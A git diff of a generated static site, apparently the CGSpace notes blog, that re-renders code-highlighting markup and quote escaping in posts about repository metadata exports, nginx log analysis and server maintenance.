&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -271,17 +271,17 @@ COPY 20994
&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
{
&amp;#34;count&amp;#34; : 100875,
&amp;#34;_shards&amp;#34; : {
&amp;#34;total&amp;#34; : 1,
&amp;#34;successful&amp;#34; : 1,
&amp;#34;skipped&amp;#34; : 0,
&amp;#34;failed&amp;#34; : 0
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;count&amp;#34; : 100875,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;_shards&amp;#34; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;total&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;successful&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;skipped&amp;#34; : 0,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;failed&amp;#34; : 0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -599,17 +599,17 @@ COPY 20994
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1277694
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot; | grep -c -E &amp;quot;/rest/bitstreams&amp;quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
106781
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -620,7 +620,7 @@ COPY 20994
<pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &#39;id,dc.</description>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
</item>
<item>
@ -634,7 +634,7 @@ COPY 20994
&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -645,7 +645,7 @@ COPY 20994
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -761,16 +761,16 @@ DELETE 1
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;01/Feb/2019:(17|18|19|20|21)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;quot;[0-9]{1,2}/Jan/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
3018243
real 0m19.873s
@ -844,7 +844,7 @@ sys 0m1.979s
&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;02/Jan/2019:0(1|2|3)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -979,7 +979,7 @@ sys 0m1.979s
&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
@ -1073,11 +1073,11 @@ sys 2m7.289s
&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &amp;quot; &amp;quot;]&amp;quot; &amp;quot;] &amp;quot;&amp;quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;quot;Error while searching for sidebar facets&amp;quot; dspace.log.*
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34
&lt;ul&gt;
&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;quot;CORE&amp;quot; /var/log/nginx/access.log
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
0
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
&lt;/code&gt;&lt;/pre&gt;</description>
</item>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -206,17 +206,17 @@
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -98,17 +98,17 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
@ -128,7 +128,7 @@
</p>
</header>
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc.
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
<a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
</article>
@ -151,7 +151,7 @@
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
